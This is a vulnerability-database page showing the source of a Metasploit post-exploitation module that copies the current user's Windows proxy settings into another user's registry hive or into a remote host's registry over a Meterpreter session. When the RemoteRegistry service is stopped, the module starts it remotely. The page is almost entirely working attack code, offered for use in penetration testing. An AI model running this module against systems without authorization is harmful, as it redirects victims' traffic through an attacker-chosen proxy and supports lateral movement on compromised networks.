Lucene search
K

Windows Manage Proxy Setting Cloner

🗓️ 21 Oct 2012 07:13:35Reported by mubix <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 38 Views

This module copies proxy settings from current user to targeted user SID, supporting remote hosts via remote registry

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name' => 'Windows Manage Proxy Setting Cloner',
      'Description' => %q{
        This module copies the proxy settings from the current user to the
        targeted user SID, supports remote hosts as well if remote registry
        is allowed.
      },
      'Author' => [ 'mubix' ],
      'License' => MSF_LICENSE,
      'Platform' => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ],
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            stdapi_registry_create_key
            stdapi_registry_open_key
            stdapi_registry_open_remote_key
          ]
        }
      }
    )

    register_options(
      [
        OptAddress.new('RHOST', [ false, 'Remote host to clone settings to, defaults to local' ]),
        OptString.new('SID', [ false, 'SID of user to clone settings to, defaults to SYSTEM', 'S-1-5-18' ])
      ]
    )
  end

  def parse_settings(data)
    print_status "\tProxy Counter = #{data[4, 1].unpack('C*')[0]}"
    case data[8, 1].unpack('C*')[0]
    when 1
      print_status "\tSetting: No proxy settings"
    when 3
      print_status "\tSetting: Proxy server"
    when 5
      print_status "\tSetting: Set proxy via AutoConfigure script"
    when 7
      print_status "\tSetting: Proxy server and AutoConfigure script"
    when 9
      print_status "\tSetting: WPAD"
    when 11
      print_status "\tSetting: WPAD and Proxy server"
    when 13
      print_status "\tSetting: WPAD and AutoConfigure script"
    when 15
      print_status "\tSetting: WPAD, Proxy server and AutoConfigure script"
    else
      print_status "\tSetting: Unknown proxy setting found"
    end

    cursor = 12
    proxyserver = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]
    print_status "\tProxy Server: #{proxyserver}" if proxyserver != ''

    cursor = cursor + 4 + data[cursor].unpack('C*')[0]
    additionalinfo = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]
    print_status "\tAdditional Info: #{additionalinfo}" if additionalinfo != ''

    cursor = cursor + 4 + data[cursor].unpack('C*')[0]
    autoconfigurl = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]
    print_status "\tAutoConfigURL: #{autoconfigurl}" if autoconfigurl != ''
  end

  def target_settings(dst_root_key, dst_base_key)
    if datastore['RHOST']
      begin
        dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)
      rescue ::Rex::Post::Meterpreter::RequestError
        print_error("Unable to contact remote registry service on #{datastore['RHOST']}")
        print_status('Attempting to start service remotely...')
        begin
          service_start('RemoteRegistry', datastore['RHOST'])
        rescue StandardError
          print_error('Unable to read registry or start the service, exiting...')
          return
        end
        startedreg = true
        dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)
      end
      dst_open_key = dst_key.open_key(dst_base_key)
    else
      dst_open_key = session.sys.registry.open_key(dst_root_key, dst_base_key)
    end

    dst_values = dst_open_key.query_value('DefaultConnectionSettings')

    # If we started the service we need to stop it.
    service_stop('RemoteRegistry', datastore['RHOST']) if startedreg

    dst_data = dst_values.data

    print_status('Current proxy settings for target:')
    parse_settings(dst_data)
  end

  def run
    if (datastore['SID'] == '') && !datastore['RHOST']
      print_error('No reason to copy the settings on top of themselves, please set a SID or/and RHOST')
      return
    end

    # Pull current user's settings
    src_root_key, src_base_key = session.sys.registry.splitkey('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections')
    src_open_key = session.sys.registry.open_key(src_root_key, src_base_key)
    src_values = src_open_key.query_value('DefaultConnectionSettings')
    src_data = src_values.data
    print_status('Proxy settings being copied:')
    parse_settings(src_data)

    # Print current settings of target
    print_status('Attempting to read target\'s settings...')
    if datastore['SID']
      dst_root_key, dst_base_key = session.sys.registry.splitkey("HKU\\#{datastore['SID']}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections")
    else
      dst_root_key, dst_base_key = session.sys.registry.splitkey('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections')
    end

    target_settings(dst_root_key, dst_base_key)

    print_status('Cloning... bahh..')

    if datastore['RHOST']
      begin
        dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)
      rescue ::Rex::Post::Meterpreter::RequestError
        print_error("Unable to contact remote registry service on #{datastore['RHOST']}")
        print_status('Attempting to start service remotely...')
        begin
          service_start('RemoteRegistry', datastore['RHOST'])
        rescue StandardError
          print_error('Unable to read registry or start the service, exiting...')
          return
        end
        startedreg2 = true
        dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)
      end
      dst_open_key = dst_key.create_key(dst_base_key, KEY_WRITE + 0x0000)
    else
      dst_open_key = session.sys.registry.create_key(dst_root_key, dst_base_key, KEY_WRITE + 0x0000)
    end

    # If we started the service we need to stop it.
    service_stop('RemoteRegistry', datastore['RHOST']) if startedreg2

    dst_open_key.set_value('DefaultConnectionSettings', REG_BINARY, src_data)

    print_status('New settings:')
    target_settings(dst_root_key, dst_base_key)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
38